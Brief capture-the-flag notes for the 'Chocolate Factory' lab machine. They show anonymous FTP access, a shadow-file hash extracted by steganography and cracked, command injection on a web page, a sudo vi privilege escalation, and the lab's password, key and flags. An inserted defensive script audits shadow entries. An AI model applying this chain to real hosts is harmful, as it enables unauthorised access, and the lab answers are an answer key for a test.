Chocolate Factory
rustscan
Found port 21 (FTP), port 22 (SSH), port 80 (HTTP) and more.
ftp
```
Connected to 10.10.10.71.
220 (vsFTPd 3.0.3)
Name (10.10.10.71:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||21456|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg
226 Directory send OK.
ftp> get gum_room.jpg
local: gum_room.jpg remote: gum_room.jpg
229 Entering Extended Passive Mode (|||52109|)
150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).
100% |**************************************| 203 KiB 115.47 KiB/s 00:00 ETA
226 Transfer complete.
208838 bytes received in 00:02 (95.84 KiB/s)
ftp> exit
221 Goodbye.
```
steghide
```
daemon::18380:0:99999:7:::
bin::18380:0:99999:7:::
sys::18380:0:99999:7:::
sync::18380:0:99999:7:::
games::18380:0:99999:7:::
man::18380:0:99999:7:::
lp::18380:0:99999:7:::
mail::18380:0:99999:7:::
news::18380:0:99999:7:::
uucp::18380:0:99999:7:::
proxy::18380:0:99999:7:::
www-data::18380:0:99999:7:::
backup::18380:0:99999:7:::
list::18380:0:99999:7:::
irc::18380:0:99999:7:::
gnats::18380:0:99999:7:::
nobody::18380:0:99999:7:::
systemd-timesync::18380:0:99999:7:::
systemd-network::18380:0:99999:7:::
systemd-resolve::18380:0:99999:7:::
_apt::18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss::18382:0:99999:7:::
shellinabox::18382:0:99999:7:::
strongswan::18382:0:99999:7:::
ntp::18382:0:99999:7:::
messagebus::18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd::18382:0:99999:7:::
debian-tor::18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad::18382:0:99999:7:::
iodine::18382:0:99999:7:::
tcpdump::18382:0:99999:7:::
miredo::18382:0:99999:7:::
dnsmasq::18382:0:99999:7:::
redis::18382:0:99999:7:::
usbmux::18382:0:99999:7:::
rtkit::18382:0:99999:7:::
sshd::18382:0:99999:7:::
postgres::18382:0:99999:7:::
avahi::18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn::18382:0:99999:7:::
nm-openconnect::18382:0:99999:7:::
pulse::18382:0:99999:7:::
saned::18382:0:99999:7:::
inetsim::18382:0:99999:7:::
colord::18382:0:99999:7:::
i2psvc::18382:0:99999:7:::
dradis::18382:0:99999:7:::
beef-xss::18382:0:99999:7:::
geoclue::18382:0:99999:7:::
lightdm::18382:0:99999:7:::
king-phisher::18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc::18451:0:99999:7:::
statd::18451:0:99999:7:::
_gvm::18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
```
john
==cn7824 (charlie)==
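The shadow-format dump above mixes three kinds of password field: empty, locked (`!` / `!!`) and a real crypt hash. As an added example (not part of the original notes), this audit script classifies each entry so a defender can spot accounts with an empty password field or a crackable hash; the function names and the sample entries are constructed for illustration.

```python
# Added example: classify /etc/shadow-style entries by password-field state.
# Function names and SAMPLE entries are constructed, not from the page.
from dataclasses import dataclass

# crypt(3) scheme identifiers (the text between the first two '$' signs)
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
           "y": "yescrypt", "2a": "bcrypt", "2b": "bcrypt"}

@dataclass
class Entry:
    user: str
    state: str   # "empty", "locked", "hash" or "other"
    scheme: str  # crypt scheme name when state == "hash", else ""

def classify(line: str) -> Entry:
    fields = line.strip().split(":")
    if len(fields) < 2:
        raise ValueError(f"not a shadow entry: {line!r}")
    user, pw = fields[0], fields[1]
    if pw == "":
        # Empty field: no password is required for this account.
        return Entry(user, "empty", "")
    if pw.startswith(("!", "*")):
        # "!" or "*" cannot be a crypt result: password login is disabled,
        # even when a hash follows the "!" (a locked account).
        return Entry(user, "locked", "")
    if pw.startswith("$"):
        scheme_id = pw.split("$")[1]
        return Entry(user, "hash", SCHEMES.get(scheme_id, "unknown"))
    return Entry(user, "other", "")  # e.g. legacy DES crypt

def audit(text: str) -> dict:
    report = {"empty": [], "locked": [], "hash": [], "other": []}
    for line in text.splitlines():
        if line.strip():
            e = classify(line)
            item = (e.user, e.scheme) if e.state == "hash" else e.user
            report[e.state].append(item)
    return report

# Constructed sample in the same layout as the dump above.
SAMPLE = """\
svc-demo::18380:0:99999:7:::
db-demo:!:18382:0:99999:7:::
core-demo:!!:18396::::::
alice:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHVALUE:18535:0:99999:7:::
"""

if __name__ == "__main__":
    for state, users in audit(SAMPLE).items():
        print(f"{state:7} {users}")
```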
gobuster
/home.php (Status: 200) [Size: 569]
We got command injection on this page.
kali machine
```
Enter your name: laksdhfas
congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Keep its safe
```
if($uname=="charlie" && $password=="cn7824")
copy id_rsa to kali machine
ssh
priv esc
==(ALL : !root) NOPASSWD: /usr/bin/vi==
enter key found
```
print(mess)
```
```
# python root.py
Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
```
Enter the key you found! b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
What is Charlie's password? cn7824
change user to charlie: No answer needed
Enter the user flag: flag{cd5509042371b34e4826e4838b522d2e}
Enter the root flag: flag{cec59161d338fef787fcb4e296b42124}
[[Cyborg]]